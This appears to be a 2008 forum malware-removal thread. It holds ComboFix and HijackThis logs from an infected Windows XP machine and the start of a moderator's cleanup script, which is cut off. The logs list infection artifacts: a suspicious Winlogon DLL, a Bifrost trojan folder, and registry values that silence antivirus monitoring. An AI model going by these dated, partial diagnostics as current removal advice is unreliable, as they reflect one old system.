2008-03-10 15:46 . 2008-03-10 15:46 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\AOL
2008-03-10 15:45 . 2008-03-10 15:47 <DIR> d-------- C:\Program Files\AIM6
2008-03-10 15:45 . 2008-03-10 15:47 445 --ah----- C:\IPH.PH
2008-03-07 16:48 . 2008-03-07 16:48 56,752 --ah----- C:\WINDOWS\system32\mlfcache.dat
2008-03-07 16:43 . 2008-03-29 09:03 <DIR> d-------- C:\Program Files\mIRC
2008-03-07 16:43 . 2008-03-29 13:02 <DIR> d-------- C:\Documents and Settings\tony\Application Data\mIRC
2008-03-07 15:34 . 2008-03-07 15:34 <DIR> d-------- C:\Program Files\LimeWire

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-04-07 15:36 --------- d-----w C:\Program Files\Microsoft AntiSpyware
2008-04-07 15:35 --------- d-----w C:\Program Files\Symantec AntiVirus
2008-04-07 15:34 --------- d-----w C:\Program Files\Bifrost
2008-04-07 14:19 --------- d-----w C:\Documents and Settings\tony\Application Data\Skype
2008-04-07 04:01 --------- d-----w C:\Documents and Settings\tony\Application Data\skypePM
2008-04-06 23:22 --------- d-----w C:\Documents and Settings\All Users\Application Data\Google Updater
2008-04-04 15:05 --------- d-----w C:\Documents and Settings\tony\Application Data\Azureus
2008-03-30 12:51 --------- d-----w C:\Program Files\Azureus
2008-03-10 19:46 --------- d-----w C:\Program Files\Viewpoint
2008-03-10 19:46 --------- d-----w C:\Documents and Settings\All Users\Application Data\Viewpoint
2008-03-04 17:39 --------- d-----w C:\Documents and Settings\tony\Application Data\AdobeUM
2008-03-04 17:25 --------- d-----w C:\Program Files\GTrends Made Easy
2008-03-03 19:47 --------- d-----w C:\Documents and Settings\tony\Application Data\Good Keywords v2
2008-03-03 19:43 --------- d-----w C:\Program Files\Softnik Technologies
2008-02-18 17:21 --------- d-----w C:\Program Files\Azoogle
2008-02-10 15:26 --------- d-----w C:\Program Files\FriendBlasterPro
2008-02-09 15:20 20 ---h--w C:\Documents and Settings\All Users\Application Data\PKP_DLec.DAT
2008-02-09 15:20 20 ---h--w C:\Documents and Settings\All Users\Application Data\PKP_DLds.DAT
2008-02-05 15:40 14,163,419 ----a-w C:\klcodec370f.exe
2008-01-29 16:06 32 ----a-w C:\Documents and Settings\All Users\Application Data\ezsid.dat
2007-10-28 01:44 67,984 ----a-w C:\Documents and Settings\tony\Application Data\GDIPFONTCACHEV1.DAT
2007-07-04 13:57 4,096 ----a-w C:\Documents and Settings\tony\log.dat
2004-03-11 17:27 40,960 ----a-w C:\Program Files\Uninstall_CDS.exe
2003-11-08 02:54 150 ---ha-w C:\Documents and Settings\tony\hpothb07.dat
.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MSMSGS"="C:\Program Files\Messenger\MSMSGS.exe" [2004-10-13 12:24 1694208]
"LDM"="C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BackWeb-8876480.exe" [2003-07-24 21:49 16384]
"Vidalia"="C:\Program Files\Vidalia Bundle\Vidalia\vidalia.exe" [ ]
"swg"="C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2007-09-09 15:15 68856]
"Skype"="C:\Program Files\Skype\Phone\Skype.exe" [2007-12-07 16:08 21686568]
"updateMgr"="C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" [2006-03-30 17:45 313472]
"Aim6"="C:\Program Files\AIM6\aim6.exe" [2008-01-03 12:15 50528]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMan"="SOUNDMAN.EXE" [2002-07-09 08:50 46592 C:\WINDOWS\SOUNDMAN.EXE]
"EM_EXEC"="C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE" [2001-09-19 09:41 35328]
"Disc Detector"="C:\Program Files\Creative\ShareDLL\CtNotify.exe" [2001-12-25 14:00 191488]
"WINDVDPatch"="CTHELPER.EXE" [2002-07-02 05:56 24576 C:\WINDOWS\system32\CTHELPER.EXE]
"UpdReg"="C:\WINDOWS\UpdReg.EXE" [2000-05-11 01:00 90112]
"Jet Detection"="C:\Program Files\Creative\SBLive\PROGRAM\ADGJDet.exe" [2001-11-29 01:00 28672]
"CTStartup"="C:\Program Files\Creative\Splash Screen\CTEaxSpl.exe" [2001-12-20 01:00 28672]
"gcasServ"="C:\Program Files\Microsoft AntiSpyware\gcasServ.exe" [2005-06-24 15:24 473928]
"RegistryMechanic"="" []
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.5.0_10\bin\jusched.exe" [2006-11-09 16:07 49263]
"Instant Buzz Daemon"="C:\Program Files\Instant Buzz\IBDaemon.exe" [ ]
"ATICCC"="C:\Program Files\ATI Technologies\ATI.ACE\cli.exe" [2006-01-02 17:41 45056]
"NWEReboot"="" []
"NeroFilterCheck"="C:\WINDOWS\system32\NeroCheck.exe" [2001-07-09 11:50 155648]
"HP Software Update"="D:\programs\HP\HP Software Update\HPWuSchd2.exe" [2005-05-11 23:12 49152]
"QuickTime Task"="C:\Program Files\QuickTime\qttask.exe" [2006-09-01 15:57 282624]
"DPAgnt"="C:\Program Files\DigitalPersona\Bin\DPAgnt.exe" [2004-10-13 19:24 913408]
"NvCplDaemon"="C:\WINDOWS\system32\NvCpl.dll" [2007-04-19 13:26 7700480]
"nwiz"="nwiz.exe" [2007-04-19 13:26 1626112 C:\WINDOWS\system32\nwiz.exe]
"NvMediaCenter"="C:\WINDOWS\system32\NvMcTray.dll" [2007-04-19 13:26 86016]
"SpySweeperEnterprise"="C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeperUI.exe" [2006-04-19 18:06 1238528]
"ccApp"="c:\Program Files\Common Files\Symantec Shared\ccApp.exe" [2005-08-02 22:00 67184]
"vptray"="c:\PROGRA~1\SYMANT~1\VPTray.exe" [2005-08-18 13:50 120640]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe [2005-09-23 23:05:26 29696]
Color Calibration.lnk - C:\Program Files\SEC\MagicTune 2.5\GammaTray.exe [2005-02-28 21:35:09 36864]
Event Reminder.lnk - D:\PrintMaster\PrintMaster 16\pmremind.exe [2004-01-20 12:10:38 339968]
Google Updater.lnk - C:\Program Files\Google\Google Updater\GoogleUpdater.exe [2007-09-09 15:15:15 126136]
HP Digital Imaging Monitor.lnk - D:\Programs\HP\Digital Imaging\bin\hpqtra08.exe [2005-05-11 23:23:26 282624]
HP Image Zone Fast Start.lnk - D:\Programs\HP\Digital Imaging\bin\hpqthb08.exe [2005-05-12 00:49:24 73728]
Logitech Desktop Messenger.lnk - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LDMConf.exe [2003-07-24 21:49:31 156160]
LUMIX Simple Viewer.lnk - C:\Program Files\Panasonic\LUMIXSimpleViewer\PhLeAutoRun.exe [2005-10-16 19:54:56 61440]
NkbMonitor.exe.lnk - C:\Program Files\Nikon\PictureProject\NkbMonitor.exe [2007-05-20 20:02:44 118784]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\DPWLN ]
C:\WINDOWS\system32\DPWLEvHd.dll 2004-10-13 19:29 102400 C:\WINDOWS\system32\DPWLEvHd.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\xxyyvSLb]
xxyyvSLb.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"msacm.l3acm"= l3codeca.acm
"VIDC.I263"= i263_32.drv
"msacm.ctmp3"= C:\WINDOWS\System32\ctmp3.acm
"vidc.LEAD"= LCODCCMP.DLL
"MSVideo8"= VfWWDM32.dll
"MSACM.MI-SC4"= MI-SC4.acm
"VIDC.wmv3"= wmv9vcm.dll
"msacm.ac3acm"= ac3acm.acm
"vidc.yv12"= yv12vfw.dll
"msacm.l3fhg"= mp3fhg.acm
"VIDC.X264"= x264vfw.dll
"VIDC.HFYU"= huffyuv.dll
"msacm.lameacm"= lameACM.acm
"msacm.divxa32"= divxa32.acm

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusDisableNotify"=dword:00000001
"AntiVirusOverride"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\Auth orizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"D:\\Utilities\\Trillian\\trillian.exe"=
"D:\\Utilities\\WS_FTP\\WS_FTP95.exe"=
"C:\\Program Files\\Logitech\\Desktop Messenger\\8876480\\Program\\backWeb-8876480.exe"=
"C:\\StubInstaller.exe"=
"C:\\Program Files\\Mozilla Firefox\\firefox.exe"=
"C:\\Program Files\\Real\\RealOne Player\\realplay.exe"=
"C:\\WINDOWS\\system32\\dpvsetup.exe"=
"C:\\WINDOWS\\system32\\rundll32.exe"=
"C:\\WINDOWS\\PCHealth\\HelpCtr\\Binaries\\helpctr.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpqtra08.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpqste08.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpofxm08.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hposfx08.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hposid01.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpqscnvw.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpqkygrp.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpqCopy.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpfccopy.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpzwiz01.exe"=
"D:\\Programs\\HP\\Digital Imaging\\Unload\\HpqPhUnl.exe"=
"D:\\Programs\\HP\\Digital Imaging\\Unload\\HpqDIA.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpoews01.exe"=
"D:\\babycam\\IPView Pro.exe"=
"C:\\Program Files\\Azureus\\Azureus.exe"=
"C:\\Program Files\\MSN Messenger\\msnmsgr.exe"=
"C:\\Program Files\\MSN Messenger\\livecall.exe"=
"C:\\Program Files\\mIRC\\mirc.exe"=
"C:\\Program Files\\LimeWire\\LimeWire.exe"=
"C:\\Program Files\\Common Files\\AOL\\Loader\\aolload.exe"=
"C:\\Program Files\\Skype\\Phone\\Skype.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\Glob allyOpenPorts\List]
"3389:TCP"= 3389:TCP:@xpsp2res.dll,-22009
"65534:TCP"= 65534:TCP:Limewire

R0 HPT371;HPT371;C:\WINDOWS\system32\DRIVERS\HPT371.sys [2002-08-01 14:01]
R0 hptpro;hptpro;C:\WINDOWS\system32\DRIVERS\hptpro.sys [2002-04-27 14:34]
R1 VIAPFD;VIAPFD;C:\WINDOWS\system32\Drivers\VIAPFD.SYS [2001-12-18 14:45]
R2 ONSIO;ONSIO;C:\WINDOWS\SYSTEM32\DRIVERS\ONSIO.SYS [1998-09-14 08:41]
R2 Viewpoint Manager Service;Viewpoint Manager Service;"C:\Program Files\Viewpoint\Common\ViewpointService.exe" [2007-01-04 17:38]
S0 SMPLSCSI;SMPLSCSI;C:\WINDOWS\system32\drivers\SMPLSCSI.SYS [1998-08-01 12:00]
S1 amdtools;AMD Special Tools Driver;C:\WINDOWS\system32\DRIVERS\amdtools.sys []
S3 dpK0Bx01;Fingerprint Reader Filter Driver;C:\WINDOWS\system32\DRIVERS\dpK0Bx01.sys [2004-08-04 17:58]
S3 dwusbdnt;dwusbdnt;C:\WINDOWS\system32\DRIVERS\dwusbdnt.sys [2002-05-24 11:52]
S3 scsiscan;SCSI Scanner Driver;C:\WINDOWS\system32\DRIVERS\scsiscan.sys [2001-08-17 13:53]
S3 TS Poster;Trackback Poster;"C:\Program Files\Trackback Spider\Poster Service.exe" [2007-05-28 18:01]
S3 UsbdpFP;Fingerprint Reader Class Driver;C:\WINDOWS\system32\DRIVERS\UsbdpFP.sys [2004-08-04 17:59]

.
Contents of the 'Scheduled Tasks' folder
"2008-03-30 00:32:00 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
"2008-04-07 12:47:24 C:\WINDOWS\Tasks\Symantec NetDetect.job"
- C:\Program Files\Symantec\LiveUpdate\NDETECT.EXE
.
**************************************************************************

catchme 0.3.1344 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-04-07 11:36:46
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Disc Detector = C:\Program Files\Creative\ShareDLL\CtNotify.exe?X???R???????????????E?@?Disc Detector?A????? ?A?? ????B?e!@???@???@?? C?????E?@?????????@?B???A????? ?A???????B???@?????P?????@?? ????????A~??????????@?q?????????????????B??????????????????????????P??????r ?B
CTStartup = C:\Program Files\Creative\Splash Screen\CTEaxSpl.EXE /run???h??????s?????\?w? ?w???????w???w4???????.??w4???????4???TA?s4???????\'2???A~??A~????????\???\ ???????????U?A~??A~\???\???????(?a??????C@?\???\??????s????\??????s\???@'2? A??s@'2??C@?x???`|?w\?????@

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
------------------------ Other Running Processes ------------------------
.
C:\Program Files\DigitalPersona\Bin\DPWinLct.exe
c:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
c:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\System32\CTsvcCDA.exe
c:\Program Files\Symantec AntiVirus\DefWatch.exe
C:\Program Files\DigitalPersona\Bin\DpHost.exe
C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
C:\WINDOWS\system32\nvsvc32.exe
c:\Program Files\Symantec AntiVirus\SavRoam.exe
c:\Program Files\Symantec AntiVirus\Rtvscan.exe
C:\Program Files\Webroot\Enterprise\Spy Sweeper\CommAgent.exe
C:\WINDOWS\System32\MsPMSPSv.exe
C:\Program Files\DigitalPersona\Bin\DPFUSMgr.exe
C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeper.exe
C:\WINDOWS\system32\WgaTray.exe
C:\Program Files\Creative\ShareDLL\MediaDet.exe
C:\Program Files\Microsoft AntiSpyware\gcasDtServ.exe
C:\WINDOWS\system32\RUNDLL32.EXE
D:\programs\HP\Digital Imaging\bin\hpqimzone.exe
D:\programs\HP\Digital Imaging\bin\hpqSTE08.exe
D:\programs\HP\Digital Imaging\Product Assistant\bin\hprblog.exe
C:\Program Files\Skype\Plugin Manager\skypePM.exe
C:\Program Files\Java\jre1.5.0_10\bin\jucheck.exe
.
**************************************************************************
.
Completion time: 2008-04-07 11:42:27 - machine was rebooted
ComboFix-quarantined-files.txt 2008-04-07 15:42:23
Pre-Run: 1,946,947,584 bytes free
Post-Run: 3,807,879,168 bytes free
.
2008-03-13 16:02:33 --- E O F ---
\\




HIJACK THIS LOG:

---------------------------------------------------------------------------------------------------------

Logfile of HijackThis v1.99.1
Scan saved at 11:49:05 AM, on 4/7/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\DigitalPersona\Bin\DPWinLct.exe
c:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
c:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\CTsvcCDA.exe
c:\Program Files\Symantec AntiVirus\DefWatch.exe
C:\Program Files\DigitalPersona\Bin\DpHost.exe
C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
C:\WINDOWS\system32\nvsvc32.exe
c:\Program Files\Symantec AntiVirus\SavRoam.exe
C:\WINDOWS\System32\svchost.exe
c:\Program Files\Symantec AntiVirus\Rtvscan.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\Program Files\Webroot\Enterprise\Spy Sweeper\CommAgent.exe
C:\WINDOWS\System32\MsPMSPSv.exe
C:\Program Files\DigitalPersona\Bin\DPFUSMgr.exe
C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeper.exe
C:\WINDOWS\system32\WgaTray.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Creative\ShareDLL\CtNotify.exe
C:\WINDOWS\system32\CTHELPER.EXE
C:\Program Files\Java\jre1.5.0_10\bin\jusched.exe
C:\Program Files\Creative\ShareDLL\MediaDet.exe
C:\Program Files\Microsoft AntiSpyware\gcasDtServ.exe
C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
D:\programs\HP\HP Software Update\HPWuSchd2.exe
C:\Program Files\QuickTime\qttask.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\DigitalPersona\Bin\DPAgnt.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeperUI.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\PROGRA~1\SYMANT~1\VPTray.exe
C:\Program Files\Messenger\MSMSGS.EXE
C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BackWeb-8876480.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\SEC\MagicTune 2.5\GammaTray.exe
C:\Program Files\Google\Google Updater\GoogleUpdater.exe
D:\Programs\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\Panasonic\LUMIXSimpleViewer\PhLeAutoRun.exe
C:\Program Files\Nikon\PictureProject\NkbMonitor.exe
D:\programs\HP\Digital Imaging\bin\hpqimzone.exe
D:\programs\HP\Digital Imaging\bin\hpqSTE08.exe
D:\programs\HP\Digital Imaging\Product Assistant\bin\hprblog.exe
C:\Program Files\Skype\Plugin Manager\skypePM.exe
C:\Program Files\Java\jre1.5.0_10\bin\jucheck.exe
C:\WINDOWS\explorer.exe
C:\WINDOWS\system32\notepad.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\HijackThis\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_10\bin\ssv.dll
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.1.615.5858\swg.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [EM_EXEC] C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
O4 - HKLM\..\Run: [Disc Detector] C:\Program Files\Creative\ShareDLL\CtNotify.exe
O4 - HKLM\..\Run: [WINDVDPatch] CTHELPER.EXE
O4 - HKLM\..\Run: [UpdReg] C:\WINDOWS\UpdReg.EXE
O4 - HKLM\..\Run: [Jet Detection] "C:\Program Files\Creative\SBLive\PROGRAM\ADGJDet.exe"
O4 - HKLM\..\Run: [CTStartup] C:\Program Files\Creative\Splash Screen\CTEaxSpl.EXE /run
O4 - HKLM\..\Run: [gcasServ] "C:\Program Files\Microsoft AntiSpyware\gcasServ.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.5.0_10\bin\jusched.exe"
O4 - HKLM\..\Run: [Instant Buzz Daemon] C:\Program Files\Instant Buzz\IBDaemon.exe
O4 - HKLM\..\Run: [ATICCC] "C:\Program Files\ATI Technologies\ATI.ACE\cli.exe" runtime -Delay
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [HP Software Update] D:\programs\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [DPAgnt] C:\Program Files\DigitalPersona\Bin\DPAgnt.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [SpySweeperEnterprise] "C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeperUI.exe" /StartInTray
O4 - HKLM\..\Run: [ccApp] "c:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [vptray] c:\PROGRA~1\SYMANT~1\VPTray.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\MSMSGS.EXE" /background
O4 - HKCU\..\Run: [LDM] C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BackWeb-8876480.exe
O4 - HKCU\..\Run: [Vidalia] "C:\Program Files\Vidalia Bundle\Vidalia\vidalia.exe"
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [updateMgr] "C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" AcRdB7_0_9 -reboot 1
O4 - HKCU\..\Run: [Aim6] "C:\Program Files\AIM6\aim6.exe" /d locale=en-US ee://aol/imApp
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Color Calibration.lnk = ?
O4 - Global Startup: Event Reminder.lnk = D:\PrintMaster\PrintMaster 16\pmremind.exe
O4 - Global Startup: Google Updater.lnk = C:\Program Files\Google\Google Updater\GoogleUpdater.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk = D:\Programs\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: HP Image Zone Fast Start.lnk = D:\Programs\HP\Digital Imaging\bin\hpqthb08.exe
O4 - Global Startup: Logitech Desktop Messenger.lnk = C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LDMConf.exe
O4 - Global Startup: LUMIX Simple Viewer.lnk = ?
O4 - Global Startup: NkbMonitor.exe.lnk = C:\Program Files\Nikon\PictureProject\NkbMonitor.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Sothink SWF Catcher - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra 'Tools' menuitem: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O16 - DPF: {5C6698D9-7BE4-4122-8EC5-291D84DBD4A0} (Facebook Photo Uploader 4 Control) - http://upload.facebook.com/controls/...oUploader3.cab
O16 - DPF: {5F8469B4-B055-49DD-83F7-62B522420ECC} (Facebook Photo Uploader Control) - http://upload.facebook.com/controls/...toUploader.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsu...?1126034224607
O16 - DPF: {6B78B13A-6E99-4588-8EAB-C2399B202022} (iVocalize Web Conference 4 Setup) - http://www.edc.inetcommunicator.net/iv4.cab
O16 - DPF: {CCA0B877-CB5E-4ADC-AD30-457C379512DD} (Gif89 Lite Class) - http://69.42.9.110/xplugLiteAL.cab
O16 - DPF: {F137B9BA-89EA-4B04-9C67-2074A9DF61FD} (Photo Upload Plugin Class) - http://costco.pnimedia.com/upload/ac...v2.0.0.10.cab?
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\MSNMES~1\MSGRAP~1.DLL
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\MSNMES~1\MSGRAP~1.DLL
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O20 - Winlogon Notify: DPWLN - C:\WINDOWS\system32\DPWLEvHd.dll
O20 - Winlogon Notify: NavLogon - c:\WINDOWS\system32\NavLogon.dll
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O20 - Winlogon Notify: WRNotifier - C:\WINDOWS\SYSTEM32\WRLogonNtf.DLL
O20 - Winlogon Notify: xxyyvSLb - xxyyvSLb.dll (file missing)
O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll
O23 - Service: Adobe LM Service - Unknown owner - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - c:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - c:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - c:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
O23 - Service: Creative Service for CDROM Access - Creative Technology Ltd - C:\WINDOWS\System32\CTsvcCDA.exe
O23 - Service: Symantec AntiVirus Definition Watcher (DefWatch) - Symantec Corporation - c:\Program Files\Symantec AntiVirus\DefWatch.exe
O23 - Service: Windows XP FUS Manager (DPFUSMgr) - DigitalPersona, Inc. - C:\Program Files\DigitalPersona\Bin\DPFUSMgr.exe
O23 - Service: Biometric Authentication Service (DpHost) - DigitalPersona, Inc. - C:\Program Files\DigitalPersona\Bin\DpHost.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: SAVRoam (SavRoam) - symantec - c:\Program Files\Symantec AntiVirus\SavRoam.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - c:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: Symantec AntiVirus - Symantec Corporation - c:\Program Files\Symantec AntiVirus\Rtvscan.exe
O23 - Service: Trackback Poster (TS Poster) - GungHo Technologies LLC - C:\Program Files\Trackback Spider\Poster Service.exe
O23 - Service: Viewpoint Manager Service - Viewpoint Corporation - C:\Program Files\Viewpoint\Common\ViewpointService.exe
O23 - Service: Webroot CommAgent Service (WebrootCommAgentService) - Webroot Software, Inc. - C:\Program Files\Webroot\Enterprise\Spy Sweeper\CommAgent.exe
O23 - Service: WebrootSpySweeperService - Webroot Software, Inc. - C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeper.exe
cybertech's Avatar
Computer Specs
Moderator with 68,029 posts.
  
Join Date: Apr 2002
Location: Washington State
07-Apr-2008, 01:20 PM #4
Open Notepad and copy and paste the text in the quote box below into it:
Quote:
Registry::
